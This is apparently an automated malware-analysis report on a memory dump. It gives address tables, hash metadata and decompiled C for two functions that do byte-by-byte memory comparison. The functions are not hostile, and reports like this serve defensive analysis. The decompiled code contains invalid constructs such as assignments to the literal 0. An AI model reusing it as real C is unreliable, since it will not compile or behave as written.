                  0x00420b0f
                  0x00420b0f
                  0x00000000
                  0x00420b02
                  0x00420ae7
                  0x00420aea
                  0x00420aee
                  0x00420af2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420af2
                  0x00420ac6
                  0x00420ac9
                  0x00420acd
                  0x00420ad1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420ad1
                  0x00420aa5
                  0x00420aa8
                  0x00420aac
                  0x00420ab0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420e9a
                  0x00420e9a
                  0x00420ea0
                  0x00420f1f
                  0x00420f21
                  0x00420f23
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420f23
                  0x00420ea2
                  0x00420ea5
                  0x00420ea9
                  0x00420eab
                  0x00420ec2
                  0x00420ec2
                  0x00420ec6
                  0x00420eca
                  0x00420ecc
                  0x00420ee3
                  0x00420ee3
                  0x00420ee7
                  0x00420eeb
                  0x00420eed
                  0x00420f04
                  0x00420f04
                  0x00420f08
                  0x00420f0c
                  0x00420f0e
                  0x00420f14
                  0x00420f17
                  0x00420f1b
                  0x00420f1b
                  0x00000000
                  0x00420f0e
                  0x00420ef3
                  0x00420ef6
                  0x00420efa
                  0x00420efe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420efe
                  0x00420ed2
                  0x00420ed5
                  0x00420ed9
                  0x00420edd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420edd
                  0x00420eb1
                  0x00420eb4
                  0x00420eb8
                  0x00420ebc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004212bb
                  0x004212bb
                  0x004212c1
                  0x00421340
                  0x00421342
                  0x00421344
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421344
                  0x004212c3
                  0x004212c6
                  0x004212ca
                  0x004212cc
                  0x004212e3
                  0x004212e3
                  0x004212e7
                  0x004212eb
                  0x004212ed
                  0x00421304
                  0x00421304
                  0x00421308
                  0x0042130c
                  0x0042130e
                  0x00421325
                  0x00421325
                  0x00421329
                  0x0042132d
                  0x0042132f
                  0x00421335
                  0x00421338
                  0x0042133c
                  0x0042133c
                  0x00000000
                  0x0042132f
                  0x00421314
                  0x00421317
                  0x0042131b
                  0x0042131f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042131f
                  0x004212f3
                  0x004212f6
                  0x004212fa
                  0x004212fe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004212fe
                  0x004212d2
                  0x004212d5
                  0x004212d9
                  0x004212dd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042061f
                  0x0042061f
                  0x00420625
                  0x004206a4
                  0x004206a6
                  0x004206a8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004206a8
                  0x00420627
                  0x0042062a
                  0x0042062e
                  0x00420630
                  0x00420647
                  0x00420647
                  0x0042064b
                  0x0042064f
                  0x00420651
                  0x00420668
                  0x00420668
                  0x0042066c
                  0x00420670
                  0x00420672
                  0x00420689
                  0x00420689
                  0x0042068d
                  0x00420691
                  0x00420693
                  0x00420699
                  0x0042069c
                  0x004206a0
                  0x004206a0
                  0x00000000
                  0x00420693
                  0x00420678
                  0x0042067b
                  0x0042067f
                  0x00420683
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420683
                  0x00420657
                  0x0042065a
                  0x0042065e
                  0x00420662
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420662
                  0x00420636
                  0x00420639
                  0x0042063d
                  0x00420641
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dfcb5f26736543fc783609c650828bf312b34bc7f444e77ccbe92bc23dd9fe9a
                  • Instruction ID: d238a30811c4ae5bff24da48d1903468bf1608a56587440d766832d2a3ad9798
                  • Opcode Fuzzy Hash: dfcb5f26736543fc783609c650828bf312b34bc7f444e77ccbe92bc23dd9fe9a
                  • Instruction Fuzzy Hash: E6027C33E497B34B8B718EB950E052B7AE05E0169035E87EADCC02F397D11ADD1A96E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042110D(void* __eax, void* __ecx) {
                  				void* _t196;
                  				signed int _t197;
                  				void* _t200;
                  				signed char _t206;
                  				signed char _t207;
                  				signed char _t208;
                  				signed char _t210;
                  				signed char _t211;
                  				signed int _t216;
                  				signed int _t316;
                  				void* _t319;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t327;
                  				void* _t330;
                  				void* _t332;
                  				void* _t334;
                  				void* _t337;
                  				void* _t339;
                  				void* _t341;
                  				void* _t344;
                  				void* _t346;
                  				void* _t348;
                  				void* _t351;
                  				void* _t353;
                  				void* _t355;
                  				void* _t358;
                  				void* _t360;
                  				void* _t362;
                  
                  				_t200 = __ecx;
                  				_t196 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                  					_t316 = 0;
                  					L17:
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					_t206 =  *(_t196 - 0x1b);
                  					if(_t206 ==  *(_t200 - 0x1b)) {
                  						_t316 = 0;
                  						L28:
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						_t207 =  *(_t196 - 0x17);
                  						if(_t207 ==  *(_t200 - 0x17)) {
                  							_t316 = 0;
                  							L39:
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							_t208 =  *(_t196 - 0x13);
                  							if(_t208 ==  *(_t200 - 0x13)) {
                  								_t316 = 0;
                  								L50:
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                  									_t316 = 0;
                  									L61:
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									_t210 =  *(_t196 - 0xb);
                  									if(_t210 ==  *(_t200 - 0xb)) {
                  										_t316 = 0;
                  										L72:
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										_t211 =  *(_t196 - 7);
                  										if(_t211 ==  *(_t200 - 7)) {
                  											_t316 = 0;
                  											L83:
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                  											if(_t319 == 0) {
                  												L5:
                  												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                  												if(_t321 == 0) {
                  													L3:
                  													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                  													if(_t197 != 0) {
                  														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                  													}
                  													L2:
                  													return _t197;
                  												}
                  												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  												if(_t216 != 0) {
                  													L86:
                  													_t197 = _t216;
                  													goto L2;
                  												} else {
                  													goto L3;
                  												}
                  											}
                  											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                  											if(_t216 == 0) {
                  												goto L5;
                  											}
                  											goto L86;
                  										}
                  										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L76:
                  											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L78:
                  												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                  												if(_t327 == 0) {
                  													L80:
                  													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                  													if(_t316 != 0) {
                  														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  													}
                  													goto L83;
                  												}
                  												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  												if(_t316 != 0) {
                  													goto L1;
                  												}
                  												goto L80;
                  											}
                  											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L78;
                  										}
                  										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L76;
                  									}
                  									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L65:
                  										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L67:
                  											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                  											if(_t334 == 0) {
                  												L69:
                  												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                  												if(_t316 != 0) {
                  													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  												}
                  												goto L72;
                  											}
                  											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L69;
                  										}
                  										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L67;
                  									}
                  									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L65;
                  								}
                  								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L54:
                  									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L56:
                  										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                  										if(_t341 == 0) {
                  											L58:
                  											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                  											if(_t316 != 0) {
                  												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											}
                  											goto L61;
                  										}
                  										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L58;
                  									}
                  									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L56;
                  								}
                  								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L54;
                  							}
                  							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L43:
                  								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L45:
                  									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                  									if(_t348 == 0) {
                  										L47:
                  										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                  										if(_t316 != 0) {
                  											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  										}
                  										goto L50;
                  									}
                  									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L47;
                  								}
                  								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L45;
                  							}
                  							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L43;
                  						}
                  						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L32:
                  							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L34:
                  								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                  								if(_t355 == 0) {
                  									L36:
                  									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                  									if(_t316 != 0) {
                  										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  									}
                  									goto L39;
                  								}
                  								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L36;
                  							}
                  							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L34;
                  						}
                  						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L32;
                  					}
                  					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                  					if(_t358 == 0) {
                  						L21:
                  						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                  						if(_t360 == 0) {
                  							L23:
                  							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                  							if(_t362 == 0) {
                  								L25:
                  								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                  								if(_t316 != 0) {
                  									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  								}
                  								goto L28;
                  							}
                  							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L25;
                  						}
                  						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L23;
                  					}
                  					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					goto L21;
                  				} else {
                  					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                  					__esi =  *(__eax - 0x1f) & 0x000000ff;
                  					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                  					if(__esi == 0) {
                  						L10:
                  						__esi =  *(__eax - 0x1e) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  						if(__esi == 0) {
                  							L12:
                  							__esi =  *(__eax - 0x1d) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  							if(__esi == 0) {
                  								L14:
                  								__esi =  *(__eax - 0x1c) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L17;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L14;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L12;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L10;
                  				}
                  				L1:
                  				_t197 = _t316;
                  				goto L2;
                  			}

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: 4741e71d284e47a3c90b35b40f6e1a7c1b277869b98708c44e50b28ba682a8f8
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: 4AD19E73E0A9B30A8735852D615823FEAA36FE174035EC7E2DCD43F39AD12A9D4095D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420CED(void* __eax, void* __ecx) {
                  				void* _t191;
                  				signed int _t192;
                  				void* _t195;
                  				signed char _t201;
                  				signed char _t202;
                  				signed char _t203;
                  				signed char _t204;
                  				signed char _t206;
                  				signed int _t211;
                  				signed int _t309;
                  				void* _t312;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t328;
                  				void* _t330;
                  				void* _t332;
                  				void* _t335;
                  				void* _t337;
                  				void* _t339;
                  				void* _t342;
                  				void* _t344;
                  				void* _t346;
                  				void* _t349;
                  				void* _t351;
                  				void* _t353;
                  
                  				_t195 = __ecx;
                  				_t191 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                  					_t309 = 0;
                  					L15:
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					_t201 =  *(_t191 - 0x1a);
                  					if(_t201 ==  *(_t195 - 0x1a)) {
                  						_t309 = 0;
                  						L26:
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						_t202 =  *(_t191 - 0x16);
                  						if(_t202 ==  *(_t195 - 0x16)) {
                  							_t309 = 0;
                  							L37:
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							_t203 =  *(_t191 - 0x12);
                  							if(_t203 ==  *(_t195 - 0x12)) {
                  								_t309 = 0;
                  								L48:
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								_t204 =  *(_t191 - 0xe);
                  								if(_t204 ==  *(_t195 - 0xe)) {
                  									_t309 = 0;
                  									L59:
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                  										_t309 = 0;
                  										L70:
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										_t206 =  *(_t191 - 6);
                  										if(_t206 ==  *(_t195 - 6)) {
                  											_t309 = 0;
                  											L81:
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                  												_t192 = 0;
                  												L3:
                  												return _t192;
                  											}
                  											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                  											if(_t312 == 0) {
                  												L4:
                  												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                  												if(_t192 != 0) {
                  													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                  												}
                  												goto L3;
                  											}
                  											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                  											if(_t211 != 0) {
                  												_t192 = _t211;
                  												goto L3;
                  											}
                  											goto L4;
                  										}
                  										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                  										if(_t314 == 0) {
                  											L74:
                  											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                  											if(_t316 == 0) {
                  												L76:
                  												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                  												if(_t318 == 0) {
                  													L78:
                  													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                  													if(_t309 != 0) {
                  														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  													}
                  													goto L81;
                  												}
                  												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  												if(_t309 != 0) {
                  													goto L1;
                  												}
                  												goto L78;
                  											}
                  											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L76;
                  										}
                  										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L74;
                  									}
                  									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                  									if(_t321 == 0) {
                  										L63:
                  										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L65:
                  											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L67:
                  												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                  												if(_t309 != 0) {
                  													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  												}
                  												goto L70;
                  											}
                  											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L67;
                  										}
                  										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L65;
                  									}
                  									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L63;
                  								}
                  								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                  								if(_t328 == 0) {
                  									L52:
                  									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L54:
                  										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L56:
                  											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                  											if(_t309 != 0) {
                  												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  											}
                  											goto L59;
                  										}
                  										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L56;
                  									}
                  									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L54;
                  								}
                  								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L52;
                  							}
                  							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                  							if(_t335 == 0) {
                  								L41:
                  								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L43:
                  									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L45:
                  										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                  										if(_t309 != 0) {
                  											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  										}
                  										goto L48;
                  									}
                  									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L45;
                  								}
                  								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L43;
                  							}
                  							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L41;
                  						}
                  						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                  						if(_t342 == 0) {
                  							L30:
                  							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L32:
                  								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L34:
                  									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                  									if(_t309 != 0) {
                  										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  									}
                  									goto L37;
                  								}
                  								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L34;
                  							}
                  							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L32;
                  						}
                  						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L30;
                  					}
                  					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                  					if(_t349 == 0) {
                  						L19:
                  						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L21:
                  							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L23:
                  								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                  								if(_t309 != 0) {
                  									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								}
                  								goto L26;
                  							}
                  							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L23;
                  						}
                  						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L21;
                  					}
                  					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					goto L19;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  					if(__esi == 0) {
                  						L8:
                  						__esi =  *(__eax - 0x1d) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  						if(__esi == 0) {
                  							L10:
                  							__esi =  *(__eax - 0x1c) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  							if(__esi == 0) {
                  								L12:
                  								__esi =  *(__eax - 0x1b) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L15;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L12;
                  						}
                  						0 = 0 | __esi > 0x00000000;
